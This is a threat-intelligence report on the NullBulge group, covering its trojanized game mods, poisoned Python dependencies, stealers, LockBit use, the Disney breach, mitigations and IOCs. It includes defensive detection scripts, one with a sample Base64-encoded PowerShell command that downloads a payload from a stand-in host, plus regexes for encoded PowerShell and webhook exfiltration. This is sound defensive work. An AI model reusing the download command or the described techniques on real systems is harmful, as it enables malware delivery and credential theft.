Threat Actor: NullBulge

Between April and June 2024, a new cybercriminal threat actor, tracked as NullBulge, emerged as an impactful threat targeting communities at the intersection of artificial intelligence (AI) development and gaming. The group cultivated a public-facing persona of a “hacktivist” collective, claiming to be motivated by a pro-artist, anti-AI ideology promoted on social media platforms such as X and 4chan. However, analysis of their activities reveals this facade to be a smokescreen for conventional, financially driven criminal operations.

NullBulge’s core operational strategy revolves around software supply chain attacks, a technique often described as “poisoning the well.” They compromise trusted software distribution channels, such as public code repositories on GitHub and Hugging Face, and distribute trojanized video game modifications to infect their targets. Initial access is typically achieved through the deployment of commodity Remote Access Trojans (RATs), primarily AsyncRAT and XWorm. These RATs serve as a foothold for subsequent data theft and the eventual deployment of customized LockBit 3.0 ransomware payloads, which are built using the leaked “LockBit Black” builder.

The group gained significant notoriety in July 2024 following a high-profile data breach targeting The Walt Disney Company. In this incident, NullBulge successfully exfiltrated over a terabyte of sensitive internal data from the company’s Slack environment, which they subsequently leaked publicly. This attack, initiated by compromising an employee’s personal device, highlights the significant risks posed by the blurring boundaries between personal and corporate computing environments.

This report provides a comprehensive analysis of NullBulge, deconstructing their identity, motivations, and operational playbook. It concludes that NullBulge exemplifies a growing trend of low-to-mid-sophistication cybercriminals who leverage ideological causes and creative social engineering within niche online communities to mask and facilitate profit-oriented attacks. Their threat lies not in advanced technical capabilities, but in their opportunistic exploitation of trust and their effective use of readily available malicious tools.

Threat Actor Profile: Identity, Motivation, and Attribution

Origins and Online Presence

NullBulge became active in the spring of 2024, with most public activity observed between May and June of that year. The group rapidly established a multifaceted online presence across both clearnet and underground platforms to promote their brand, distribute malware, and leak stolen data. They operate under several known aliases, with NullBulge Group being their primary identifier. Their malware distribution campaigns are heavily associated with the developer personas AppleBotzz and BeamerNGz. The AppleBotzz identity, which had a presence on GitHub and various modding websites, was either a legitimate developer whose accounts were compromised and subsequently co-opted by NullBulge, or a purpose-built persona created by the group from the outset to serve as a trusted vehicle for malware delivery.

The group maintains a carefully curated public presence to project its hacktivist image. This includes an active account on X (formerly Twitter) under the handle @nullbulgegroup and a presence on 4chan, where they post under the tripcode !!z694g7GKz7l to announce their activities. For their more illicit operations, they utilize underground forums such as BreachForums for data leak announcements and cracked.io for selling stolen assets. They have also been observed using the e-commerce platform Sellix under the name NullBulgeGroup to monetize stolen data directly. A unique and notable aspect of their branding is their self-identification as a “furry hacktivist group,” an unusual cultural signifier that likely serves to generate media attention and create a distinct, memorable identity within the crowded threat landscape.

Deconstructing the “Hacktivist” Motivation

NullBulge’s public communications are built around a central, ideological claim: they are hacktivists dedicated to “protecting artists’ rights and ensuring fair compensation for their work”. They position themselves as adversaries of AI-generated art, which they believe harms the creative industry, and also claim to be anti-cryptocurrency. Their data leak site (DLS) even features a mission statement outlining the “sins” that would make an entity a target, including the promotion of AI art or crypto-related products.

Despite this carefully crafted narrative, a significant body of evidence points to their true motivation being financial gain. The hacktivist persona appears to be a calculated psychological operation. A generic cybercrime group is easily categorized and dismissed, whereas a group with a peculiar and seemingly ideological identity generates media intrigue and public confusion. This confusion serves as an effective smokescreen, diverting attention from their conventional criminal activities and toward their purported “cause.” By tapping into a genuine cultural debate surrounding AI and art, they create a veneer of moral justification that complicates public perception and amplifies the psychological impact of their attacks.

The evidence contradicting their hacktivist claims is definitive:

  • Sale of Stolen Data: The group has a documented history of selling infostealer logs harvested from a custom stealer on the cracked.io underground forum.
  • Sale of API Keys: They have been observed selling stolen OpenAI API keys on both underground forums and their Sellix profile, a purely profit-driven activity.
  • Use of Ransomware: Their deployment of LockBit 3.0 ransomware is the most compelling evidence of their financial focus. Ransomware is a tool of extortion, fundamentally incompatible with a purely ideological hacktivist mission.
  • Cryptocurrency Wallet: The group maintains and publishes a Monero (XMR) wallet address for payments, directly contradicting their anti-crypto stance and confirming their use of cryptocurrency for financial transactions. The address is 45i7kjWZuzJ4PdSbandaaE8S6mQATmneTYEpgsaaCqDmc7foEJDXwxd3ABR8bn6YE4c7hZ2dYEEr1CwG48gAknPL6zUpYyV.

Attribution and Skill Assessment

NullBulge has claimed to be of Russian origin, a common tactic used by threat actors to imply they are beyond the reach of Western law enforcement. However, this claim is disputed by security researchers who have noted that the syntax and grammar used in their English-language communications, particularly on their X feed, are more consistent with that of a native English speaker. The Russian origin claim is therefore assessed with low confidence and is likely a deliberate misdirection.

From a technical perspective, NullBulge is assessed as a low-skilled but highly creative and opportunistic threat actor. Their operational model represents a form of “democratized” cybercrime, where access to leaked tools and a keen understanding of social dynamics can substitute for advanced technical capabilities. The group does not appear to develop its own sophisticated malware from scratch. Instead, they rely on readily available commodity malware like AsyncRAT and XWorm and leverage the leaked LockBit 3.0 builder for their ransomware operations. This reliance on off-the-shelf tools significantly lowers the barrier to entry for conducting impactful attacks. Their primary innovation lies not in code, but in their distribution strategy. By targeting niche communities of AI developers and gamers—where trust in shared code is high and security practices can be inconsistent—they have found a fertile ground for their attacks. Their choice to operate their own DLS and social media profiles, rather than working as an affiliate for an established Ransomware-as-a-Service (RaaS) operation like LockBit, further indicates their status as an independent, albeit less sophisticated, entity.

Victimology and Targeting Strategy

NullBulge’s targeting strategy is highly focused, concentrating on communities where their “poisoning the well” approach is most effective. Their choice of victims reflects a deep understanding of how to exploit the trust inherent in open-source and collaborative online environments.

Primary Target Demographics

The group’s campaigns are primarily directed at two overlapping demographics:

  • AI-Centric Communities: This includes developers, researchers, hobbyists, and end-users of AI tools and platforms. They have shown a particular interest in the generative AI space, targeting users of applications like Stable Diffusion and ComfyUI.
  • Gaming Communities: The group has specifically targeted the modding community for the vehicle simulation game Beam.NG. This community is characterized by the frequent downloading and sharing of user-created modifications, making it an ideal vector for malware distribution.

The rationale for this targeting is clear: both of these communities actively encourage the downloading and execution of code from semi-trusted public sources like GitHub, Hugging Face, and mod-hosting websites. This behavior creates a perfect attack surface for NullBulge’s methods, allowing them to disguise their malicious payloads as legitimate and desirable software enhancements.

Known and Claimed Corporate & Individual Victims

While their initial campaigns focused on widespread infection of individuals within their target demographics, NullBulge has also claimed responsibility for several targeted corporate breaches.

  • The Walt Disney Company: Their most significant and widely publicized victim. The breach, which occurred in July 2024, was achieved by compromising a single employee and led to a massive data leak.
  • A U.S.-based Non-Profit: The group has listed a non-profit organization in the United States on its DLS, though details of this breach are scarce.
  • An AI and Cryptocurrency-related Company: In a clear contradiction of their stated ideology, NullBulge claims to have breached a company involved in both AI and cryptocurrency, reinforcing the assessment that their motivations are financial.
  • An Individual Streamer based in India: This claimed victim demonstrates that the group’s targeting is not limited to corporate entities and that they are willing to attack individuals for potential financial gain or notoriety.
  • Developer “AppleBotzz”: The individual or entity behind the AppleBotzz developer persona can be considered the group’s foundational victim, as the co-opting of this identity was central to their initial malware distribution campaigns.

The group’s targeting strategy is a textbook example of “island hopping,” a tactic where an attacker compromises a less-secure peripheral target to gain access to a more valuable, well-defended one. Attacking Disney’s hardened corporate perimeter directly would likely be beyond NullBulge’s capabilities. It was far easier to target a Disney developer through their personal interests, such as gaming or AI experimentation on a personal computer. Once the employee’s less-secure personal device was compromised via a malicious game mod or AI tool, the attackers could harvest stored corporate credentials or active session tokens. This allowed them to pivot, or “hop,” from the low-security island of the personal machine to the high-value target of Disney’s internal corporate network. This case vividly demonstrates a critical modern threat vector: the security risks arising from the dissolution of the traditional network perimeter.

Operational Analysis: Anatomy of an Attack (TTPs)

NullBulge’s attacks follow a consistent and observable pattern, relying on social engineering and supply chain abuse for initial access, followed by the use of commodity malware for persistence and payload delivery. Their TTPs can be broken down across the cyber attack lifecycle.

Initial Access: “Poisoning the Well” in Trusted Repositories

NullBulge’s primary method for gaining initial access is by compromising the software supply chain of their target communities.

  • Trojanized Game Modifications: The group has been highly active in the Beam.NG modding community. Their method involves embedding malicious Lua scripts, often named versioncheck.lua, within otherwise functional game mods. These scripts contain Base64-encoded PowerShell commands. When a user installs and runs the mod, the game engine executes the Lua script, which in turn decodes and runs the PowerShell payload. This payload typically uses the Invoke-WebRequest cmdlet to download the next stage of the malware from a hosting site like GitHub or pixeldrain.
  • Software Supply Chain Compromise (AI Tooling): For their AI-focused targets, NullBulge compromises extensions and packages hosted on platforms like GitHub and Hugging Face. Specific examples include the trojanizing of the ComfyUI_LLMVISION extension and the creation of malicious tools like “SillyTavern Character Generator”. Their technique often involves leaving the primary source code of the tool intact to avoid suspicion. Instead, they modify the requirements.txt file, which specifies the project’s dependencies. This file is altered to point to a malicious version of a legitimate library, such as those for OpenAI or Anthropic. To evade detection, the malicious package version is often only a minor increment higher than the official one (e.g., openai-1.16.3 instead of the legitimate 1.16.2), tricking automated package managers into downloading it. These malicious Python wheel (.whl) files contain their info-stealing payloads.
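As an added example (not code from the report, from NullBulge's tooling, or from any of the projects named above), the following Python script implements two defender-side checks for the two tricks just described: decoding suspicious Base64 strings found in a mod's Lua files, and validating a requirements.txt against a snapshot of versions known to exist on the official index so that a pin that is one patch level "ahead" of reality stands out. The sample Lua file, the requirements file and the version snapshot are constructed for the demo; only openai 1.16.2 as the legitimate version comes from the report.

```python
"""Added example (not NullBulge's, the report's, or any project's code): two
defensive checks for the initial-access tricks described above.

1. find_encoded_powershell(): scans a Lua file from a game mod for Base64 runs
   that decode to a PowerShell download/execute command.
2. check_requirements(): compares a requirements.txt against a snapshot of
   versions known to exist on the official index and flags pins that are one
   step ahead of it, direct-URL or index-override lines, unpinned ranges, and
   packages missing from the allowlist.

All sample inputs are constructed here; the version snapshot is an assumption,
except openai 1.16.2, which the report cites as the legitimate version.
"""
import base64
import binascii
import re
from typing import Dict, List, Tuple

PS_INDICATORS = re.compile(
    r"Invoke-WebRequest|\bIWR\b|Invoke-Expression|\bIEX\b|DownloadString|"
    r"DownloadFile|Start-Process|-EncodedCommand|\bpowershell\b",
    re.IGNORECASE,
)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
REQ_LINE = re.compile(r"^([A-Za-z0-9_.\-]+)\s*==\s*([0-9][0-9A-Za-z.\-]*)$")


def _decode_candidates(blob: str) -> List[str]:
    """Decode a Base64 run as UTF-16LE (PowerShell -EncodedCommand) and as UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, binascii.Error):
        return []
    texts = []
    for enc in ("utf-16-le", "utf-8"):
        try:
            texts.append(raw.decode(enc))
        except UnicodeDecodeError:
            pass
    return texts


def find_encoded_powershell(lua_text: str) -> List[str]:
    """Return decoded PowerShell commands hidden as Base64 strings in a Lua script."""
    hits = []
    for match in B64_RUN.finditer(lua_text):
        for text in _decode_candidates(match.group(0)):
            if PS_INDICATORS.search(text):
                hits.append(text)
    return hits


def _vtuple(version: str) -> Tuple[int, ...]:
    # Numeric-only version tuple; enough for the "one patch level ahead" comparison.
    return tuple(int(x) for x in re.findall(r"\d+", version))


def check_requirements(req_text: str, known_latest: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (package_or_line, pinned_version, reason) for every suspicious requirement."""
    findings = []
    for raw_line in req_text.splitlines():
        line = raw_line.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("-") or "@" in line or "://" in line:
            # Index overrides and direct URL installs bypass the trusted index entirely.
            findings.append((line, "", "index override or direct URL install"))
            continue
        match = REQ_LINE.match(line)
        if not match:
            findings.append((line, "", "unpinned or unparsable requirement"))
            continue
        name, version = match.group(1).lower().replace("_", "-"), match.group(2)
        if name not in known_latest:
            findings.append((name, version, "package not on the allowlist"))
        elif _vtuple(version) > _vtuple(known_latest[name]):
            findings.append((name, version, f"pinned ahead of known latest {known_latest[name]}"))
    return findings


# Constructed sample: a Lua file whose only payload is an encoded string (nothing is executed).
_PS_SAMPLE = "Invoke-WebRequest -Uri https://example.invalid/stage2 -OutFile $env:TEMP\\upd.bin"
_ENCODED = base64.b64encode(_PS_SAMPLE.encode("utf-16-le")).decode("ascii")
SAMPLE_LUA = 'local M = {}\nfunction M.check()\n  local s = "' + _ENCODED + '"\n  return s\nend\nreturn M\n'

SAMPLE_REQUIREMENTS = """
# constructed requirements.txt in the style the report describes
torch==2.2.1
openai==1.16.3
anthropic==0.21.3
pillow>=10.0
requests @ https://example.invalid/requests-2.31.0-py3-none-any.whl
"""
KNOWN_LATEST = {"torch": "2.2.1", "openai": "1.16.2"}  # constructed snapshot of the official index

if __name__ == "__main__":
    for cmd in find_encoded_powershell(SAMPLE_LUA):
        print("encoded PowerShell found:", cmd)
    for item, version, reason in check_requirements(SAMPLE_REQUIREMENTS, KNOWN_LATEST):
        print(f"{item} {version}: {reason}")
```

In practice the snapshot would be refreshed from the index at review time, and any pin the index does not know is treated as a blocking finding rather than a warning.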

Execution and Payload Delivery

Once the initial access vector is triggered, the downloaded script executes a second-stage payload. These payloads are consistently commodity RATs, which grant the attackers persistent remote control over the victim’s machine. The two primary RATs used by NullBulge are AsyncRAT and XWorm. In one observed campaign targeting Beam.NG users, the AsyncRAT payload was downloaded from pixeldrain.com and executed under the process name BeamNG.UI.exe to blend in with legitimate game processes.

Credential Access and Data Harvesting

After establishing persistence with a RAT, NullBulge deploys custom Python-based info-stealers to harvest sensitive data. These stealers are often bundled within the malicious Python libraries used in their supply chain attacks.

  • Browser Credential Theft: Scripts like Fadmino.py are designed to target and exfiltrate data from web browsers, including cookies, saved passwords, and session data. They achieve this by accessing the local Network Security Services (NSS) databases used by Firefox and Chrome-based browsers.
  • Comprehensive System Profiling: Other scripts, such as admin.py and cadmino.py, expand the scope of data collection. They gather detailed system information, geographic location data (based on IP address), lists of installed applications and security products, and financial data stored on the system.
  • API Key Theft: A primary goal of their AI-tool-focused attacks is the theft of API keys. The malicious libraries are coded to specifically search for and exfiltrate API keys for services like OpenAI and Anthropic as soon as they are loaded by the host application.

Exfiltration and Command & Control (C2)

For data exfiltration and C2, NullBulge employs a simple yet effective technique: Discord webhooks. The Python stealer scripts aggregate all the harvested data and transmit it via HTTP POST requests to a hardcoded Discord webhook URL. This method is advantageous for a low-skilled actor as it requires no dedicated C2 server infrastructure and the traffic can easily blend with legitimate web traffic to evade basic network security controls.

Impact and Monetization

The final stage of a NullBulge attack is monetization, primarily achieved through ransomware and data extortion.

  • Ransomware Deployment: As a final payload, delivered via the established RAT access, NullBulge deploys a customized version of LockBit 3.0 (also known as LockBit Black) ransomware.
  • Tooling and Configuration: They utilize the complete leaked LockBit 3.0 builder package, including builder.exe, keygen.exe, and build.bat. While the builder tools themselves are unmodified, NullBulge customizes the config.json file to tailor the ransomware’s behavior. Their typical configuration enables the encryption of both local volumes and accessible network shares, uses the “auto” encryption mode for speed, and is set to self-delete after execution to hinder forensic analysis. A notable feature they enable is the ability to send the ransom note to all attached printers, a classic LockBit tactic designed to maximize the victim’s awareness of the attack.
  • Double Extortion and Data Leak Sites (DLS): Following modern ransomware trends, NullBulge practices double extortion. Before encrypting files, they exfiltrate sensitive data. This data is then used as leverage, with the threat of public release if the ransom is not paid. To facilitate this, they operate multiple DLS domains, including nullbulge[.]com, nullbulge[.]se, nullbulge[.]co, and a Tor-based onion site.

Malware & Tooling Arsenal

The following table provides a consolidated view of the tools employed by NullBulge and their function within the attack chain.

| Tool Name | Tool Type | Role in Attack Chain | Delivery Mechanism | Key Features/Notes |
|---|---|---|---|---|
| AsyncRAT | Remote Access Trojan | Persistence, Command & Control, Payload Delivery | PowerShell downloader via Lua script in game mods | Commodity RAT. Observed downloaded as BeamNG.UI.exe. |
| XWorm | Remote Access Trojan | Persistence, Command & Control, Payload Delivery | PowerShell downloader via Lua script in game mods | Commodity RAT used interchangeably with AsyncRAT. |
| Custom Python Stealer | Infostealer | Credential Access, Data Harvesting, Exfiltration | Embedded in malicious Python wheel (.whl) files | Scripts like Fadmino.py and admin.py. Targets browser NSS databases and API keys. Exfiltrates data via Discord webhooks. |
| LockBit 3.0 (Black) | Ransomware | Impact, Monetization | Deployed as a final stage payload via RAT access | Uses leaked builder with a custom config.json. Enables network share encryption and printing of ransom notes. |

Case Study: The July 2024 Disney Breach

The data breach of The Walt Disney Company in July 2024 was the event that propelled NullBulge from a niche threat into the global spotlight. A detailed reconstruction of this incident serves as a critical case study on the risks of supply chain attacks and the erosion of the network perimeter.

Attack Timeline and Vector Reconstruction

The attack unfolded over several stages, likely beginning weeks or months before the public disclosure.

  • Initial Compromise: The entry point was not Disney’s corporate network, but the personal computer of a technical lead employed by the company. This employee, on their unmanaged personal device, downloaded and installed a malicious software package created by NullBulge. The evidence points to one of two vectors: either a trojanized modification for the game Beam.NG or the malicious ComfyUI_LLMVISION AI tool extension.
  • Credential Theft: Once executed on the employee’s machine, NullBulge’s info-stealing malware harvested a wide range of sensitive credentials. The most critical of these were credentials for the employee’s password manager and, crucially, active session tokens or cookies for their corporate Slack account.
  • Access and Exfiltration: Armed with these stolen credentials, NullBulge was able to bypass Disney’s perimeter defenses and log into the corporate Slack environment, effectively impersonating the employee. The compromised employee account had exceptionally broad access permissions, with visibility into nearly 10,000 internal Slack channels. The attackers then proceeded to systematically scrape and exfiltrate an enormous volume of data, estimated to be between 1.1 and 1.2 TB.
  • Public Leak: On July 12, 2024, NullBulge publicly announced the breach on underground forums like BreachForums and began leaking the stolen data via their DLS. They notably chose to leak the data immediately rather than attempting to privately ransom Disney, a decision that aligns with their public hacktivist persona but may also have been a recognition that a company of Disney’s scale would be unlikely to pay.

Deconstructing the “Insider Threat” Narrative

In their public communications, NullBulge heavily promoted the idea that they were aided by a malicious insider. They claimed to have an “inside man” who eventually “got cold feet and kicked us out”. To lend credence to this story, they doxxed the compromised employee, leaking an extensive amount of their personally identifiable information (PII), including their Social Security number, banking information, and data from their password manager.

However, a technical analysis of the incident suggests the “insider threat” narrative was likely a fabrication. This narrative served to amplify the psychological impact of the breach, sow distrust and chaos within Disney, and deflect from the less sensational reality of the attack vector. The available evidence strongly supports a scenario where a standard remote compromise of an employee’s poorly secured personal device led to the theft of corporate credentials. The subsequent doxxing of the employee was not proof of their collusion, but rather a punitive and intimidating act against the individual whose account they had successfully compromised. This fits the group’s pattern of framing their actions as “payback”.

Analysis of Exfiltrated Data

The data exfiltrated from Disney’s Slack environment was extensive and highly sensitive. The dump contained years of internal communications, files, source code snippets, details of unreleased projects, links to internal APIs and web pages, some login credentials, and employee PII. Publicly reviewed portions of the leak included conversations related to the maintenance of corporate websites, ongoing software development projects, and internal employee programs.

The impact on Disney was severe. The breach resulted in the exposure of significant intellectual property and internal operational secrets. The leaked credentials and API keys created an immediate and ongoing security risk, requiring a massive incident response effort. In the aftermath, Disney announced its intention to migrate its internal communications from Slack to Microsoft Teams, a move that some analysts have suggested may be more about shifting blame for the incident than implementing a fundamentally more secure solution.

This breach serves as a seminal case study on the catastrophic risk posed by the dissolution of the traditional network perimeter. The attack did not exploit a vulnerability in Slack’s platform or Disney’s core infrastructure. Instead, the point of failure was the intersection of an employee’s personal and professional digital lives. The incident demonstrates that robust perimeter security is insufficient when an attacker can simply steal the keys to the kingdom from an employee’s unmanaged and insecure personal device. It highlights a critical defensive gap for modern organizations: the need for Zero Trust security models that can enforce authentication and device posture checks for every access request to corporate SaaS applications, regardless of its origin.

Defensive Mitigations and Strategic Recommendations

Defending against a threat actor like NullBulge requires a multi-layered approach that combines strategic policy changes with tactical security controls. The focus should be on securing the software supply chain and implementing a Zero Trust security posture to mitigate risks from compromised personal devices.

Strategic Recommendations (For Leadership)

  • Secure the Software Supply Chain: Organizations, particularly those with software development teams, must implement rigorous policies for vetting third-party code. This should include mandatory security scanning of all open-source libraries and dependencies before they are integrated into development pipelines. A formal code review process for any external components should be enforced to identify suspicious modifications, such as altered dependency files.
  • Developer Security Awareness Training: Developers are a primary target for actors like NullBulge. Organizations should conduct targeted security training that specifically addresses the risks of trojanized development tools, dependency confusion attacks, and the critical importance of maintaining a secure separation between personal and professional development environments.
  • Embrace a Zero Trust Architecture: The Disney breach underscores the inadequacy of perimeter-based security models. Organizations should accelerate the adoption of a Zero Trust architecture. For critical SaaS applications like Slack, this means that no user or device is trusted by default. Every access attempt must be verified through strong multi-factor authentication (MFA), and access should be conditional based on device health and posture checks. This prevents stolen credentials from being the sole key needed for access.

Tactical Mitigations (For Security Teams)

  • Application Allowlisting: Implementing application allowlisting is a highly effective control against the initial stages of a NullBulge attack. By only permitting approved applications to run, the execution of unauthorized malware droppers downloaded by game mods or malicious libraries can be blocked by default.
  • PowerShell Hardening and Monitoring: Given NullBulge’s use of encoded PowerShell commands, PowerShell execution should be constrained on endpoints where it is not required for administrative tasks. For all other systems, enhanced PowerShell logging (including script block and module logging) should be enabled and forwarded to a SIEM to detect the execution of obfuscated or suspicious commands.
  • Egress Traffic Filtering and Monitoring: NullBulge relies on outbound connections to Discord for C2 and data exfiltration. Organizations should monitor for and consider blocking outbound web traffic to Discord and similar services from corporate assets, especially servers and developer workstations, where such traffic is not expected.
  • Endpoint Detection and Response (EDR): A robust EDR solution is critical for detecting the behavioral anomalies associated with a NullBulge infection. EDR tools can identify suspicious process chains (e.g., a game process spawning PowerShell), unauthorized access to browser credential stores, and the execution of known RATs.
  • Secure API Key and Secrets Management: Developers should be mandated to use secure enterprise vaults for storing and managing API keys and other secrets. Secrets should never be hardcoded in source code or stored in plaintext files on developer workstations, where they can be easily harvested by info-stealers.
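As an added example (not code from the report or from any vendor's product), the script below turns the Discord-webhook exfiltration channel described in the C2 section and the PowerShell and EDR mitigations listed above into concrete detection logic run over constructed telemetry: it totals HTTP POSTs to Discord webhook endpoints per client from proxy logs, and flags process-creation events where a game process spawns a shell, PowerShell runs encoded or hidden, or a binary named BeamNG.UI.exe runs outside the game's install directory. The log format, hostnames, paths, game process names and install directory are assumptions made for the demo.

```python
"""Added example (not the report's or any vendor's code): detection logic for the
NullBulge behaviours described above, run over constructed sample telemetry.

- flag_webhook_exfil(): scans proxy log lines for HTTP POSTs to Discord webhook
  endpoints and totals the bytes each client sent there.
- flag_process_anomalies(): scans process-creation events for a game process
  spawning a shell, encoded or hidden PowerShell, and a binary named
  BeamNG.UI.exe running outside the game's install directory.

Log format, hostnames, paths, game process names and the expected install
directory are constructed assumptions for the demo.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

WEBHOOK_RE = re.compile(
    r"https?://(?:[\w.-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/", re.IGNORECASE
)
# Matches -e / -ec / -enc / -EncodedCommand; the lookarounds keep -ExecutionPolicy from matching.
ENCODED_PS_RE = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?(?=\s)", re.IGNORECASE)
HIDDEN_PS_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
GAME_PROCESSES = {"beamng.drive.x64.exe", "beamng.ui.exe"}  # assumed game process names
GAME_INSTALL_DIR = "c:\\program files\\beamng.drive\\"  # assumed install location


def flag_webhook_exfil(log_lines: List[str]) -> Dict[str, Dict[str, int]]:
    """Per client IP: count of POSTs to Discord webhooks and total bytes sent.

    Constructed line format: '<timestamp> <client_ip> <method> <url> <bytes_sent>'.
    """
    totals: Dict[str, Dict[str, int]] = defaultdict(lambda: {"posts": 0, "bytes": 0})
    for line in log_lines:
        parts = line.split()
        if len(parts) != 5:
            continue  # malformed line; a production pipeline would log and skip it
        _ts, client, method, url, size = parts
        if method.upper() == "POST" and WEBHOOK_RE.match(url):
            totals[client]["posts"] += 1
            totals[client]["bytes"] += int(size)
    return dict(totals)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_process_anomalies(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (host, rule_name, detail) for every detection rule an event matches."""
    findings = []
    for ev in events:
        parent, child = _basename(ev["parent_image"]), _basename(ev["image"])
        cmd = ev.get("cmdline", "")
        if parent in GAME_PROCESSES and child in SHELLS:
            findings.append((ev["host"], "game_process_spawned_shell", f"{parent} -> {child}"))
        if child in ("powershell.exe", "pwsh.exe") and (ENCODED_PS_RE.search(cmd) or HIDDEN_PS_RE.search(cmd)):
            findings.append((ev["host"], "encoded_or_hidden_powershell", cmd))
        if child == "beamng.ui.exe" and not ev["image"].lower().startswith(GAME_INSTALL_DIR):
            findings.append((ev["host"], "game_binary_name_outside_install_dir", ev["image"]))
    return findings


# Constructed proxy log: one developer laptop posting large bodies to a webhook, plus benign noise.
SAMPLE_PROXY_LOG = """\
2024-06-01T12:00:01Z 10.0.0.5 GET https://cdn.discordapp.com/attachments/1/2/img.png 20311
2024-06-01T12:00:07Z 10.0.0.5 POST https://discord.com/api/webhooks/111111111111111111/REDACTED 48213
2024-06-01T12:00:09Z 10.0.0.5 POST https://discord.com/api/webhooks/111111111111111111/REDACTED 913337
2024-06-01T12:01:30Z 10.0.0.9 POST https://api.github.com/repos/example/repo/issues 1200
2024-06-01T12:02:00Z 10.0.0.7 POST https://discordapp.com/api/webhooks/222222222222222222/REDACTED 5120
"""

# Constructed process-creation events (Sysmon-style fields). "QQBCAEMA" is UTF-16LE "ABC" in Base64.
SAMPLE_EVENTS = [
    {"host": "dev-laptop", "parent_image": r"C:\Program Files\BeamNG.drive\BeamNG.drive.x64.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc QQBCAEMA"},
    {"host": "dev-laptop", "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\BeamNG.UI.exe", "cmdline": "BeamNG.UI.exe"},
    {"host": "build-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for client, stats in flag_webhook_exfil(SAMPLE_PROXY_LOG.splitlines()).items():
        print(f"{client}: {stats['posts']} webhook POSTs, {stats['bytes']} bytes")
    for host, rule, detail in flag_process_anomalies(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {detail}")
```

The byte totals are what make the webhook rule useful: a few kilobytes to a webhook is ordinary chat integration traffic, while hundreds of kilobytes from a developer workstation is the stealer's aggregated dump.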

Indicators of Compromise (IOCs)

The following table contains a comprehensive list of known technical indicators associated with NullBulge activity. These IOCs can be used for threat hunting, detection rule creation, and incident response.

| Indicator Type | Indicator Value | Description/Context |
|---|---|---|
| SHA1 | f37da01783982b7b305996a23f8951693eb78f72 | Async RAT payload downloaded from Pixeldrain. |
| SHA1 | 0cd5dc12bca41f6667547aa10b9cf1d989ba30a0 | Async RAT payload downloaded from Pastebin. |
| SHA1 | 843d0df759ffd79b00f0adef3371e003a3539977 | XWorm RAT payload downloaded from Pastebin. |
| SHA1 | c6a884dcf21c44de3e83427a28428c24582a8b6f | Malicious Python wheel: anthropic-0.21.3-py3-none-any.whl. |
| SHA1 | 5a18ba89c118a7c31f3e8f674727da08779421ce | Malicious Python wheel: openai-1.16.2-py3-none-any.whl. |
| SHA1 | 89d9b7c3eff0a15dc9dbbfe2163de7d5e9479f58 | LockBit 3.0 ransomware payload. |
| SHA1 | 93460d0789dce9cf65a90e542424b0ac057e1dc5 | Python stealer script: admin.py. |
| SHA1 | dcb47900458692589a594a293c1c7c2559cc4cbe | Python stealer script: Fadmino.py. |
| SHA1 | 2d1dca9c10996143b698a9351d1eb446c19f92a7 | Malicious Lua script from BeamNG mod: VersionCheck.lua. |
| SHA1 | bca6d4ab71100b0ab353b83e9eb6274bb018644e | Leaked LockBit 3.0 builder archive: LockBit3Builder.zip. |
| SHA256 | f28599b06560617bccdfb56acc841f3e642ff51b9956632fcc4204f026711e23 | LockBit 3.0 ransomware payload. |
| Domain | nullbulge.com | NullBulge Data Leak Site (DLS). |
| Domain | nullbulge.se | NullBulge Data Leak Site (DLS). |
| Domain | nullbulge.co | NullBulge Data Leak Site (DLS). |
| Domain | group.goocasino.org | Network IOC associated with NullBulge infrastructure. |
| IP Address | 86.107.168.9 | Network IOC associated with NullBulge infrastructure. |
| Onion Address | nullblgtk7dwzpfklgktzll27ovvnj7pvqkoprmhubnnb32qcbmcpgid.onion | NullBulge Tor-based Data Leak Site (DLS). |
| URL | https://github.com/AppleBotzz | GitHub account used for malware distribution. |
| URL | https://cracked.io/NullBulge | Underground forum profile used for selling stolen data. |
| XMR Wallet | 45i7kjWZuzJ4PdSbandaaE8S6mQATmneTYEpgsaaCqDmc7foEJDXwxd3ABR8bn6YE4c7hZ2dYEEr1CwG48gAknPL6zUpYyV | Monero wallet address used for receiving payments. |

MITRE ATT&CK® Mapping

The following table maps the observed Tactics, Techniques, and Procedures (TTPs) of NullBulge to the MITRE ATT&CK® framework for Enterprise. This mapping can be used to assess defensive coverage and guide threat hunting activities.

| Tactic | Technique ID | Technique Name | Sub-Technique ID | Sub-Technique Name | NullBulge’s Implementation |
|---|---|---|---|---|---|
| Initial Access | T1195 | Supply Chain Compromise | T1195.001 | Compromise Software Dependencies and Development Tools | Modifies requirements.txt in GitHub repositories to point to malicious Python wheels containing info-stealers. |
| Initial Access | T1195 | Supply Chain Compromise | T1195.002 | Compromise Software Supply Chain | Distributes trojanized video game modifications (Beam.NG) on public modding websites. |
| Execution | T1059 | Command and Scripting Interpreter | T1059.001 | PowerShell | Uses Base64-encoded PowerShell commands within malicious Lua scripts to download and execute second-stage payloads. |
| Execution | T1059 | Command and Scripting Interpreter | T1059.006 | Python | Malicious Python wheels execute info-stealing scripts upon being imported by a legitimate application. |
| Persistence | T1547 | Boot or Logon Autostart Execution | T1547.001 | Registry Run Keys / Startup Folder | Deploys commodity RATs (AsyncRAT, XWorm) which typically establish persistence through registry run keys or startup folder entries. |
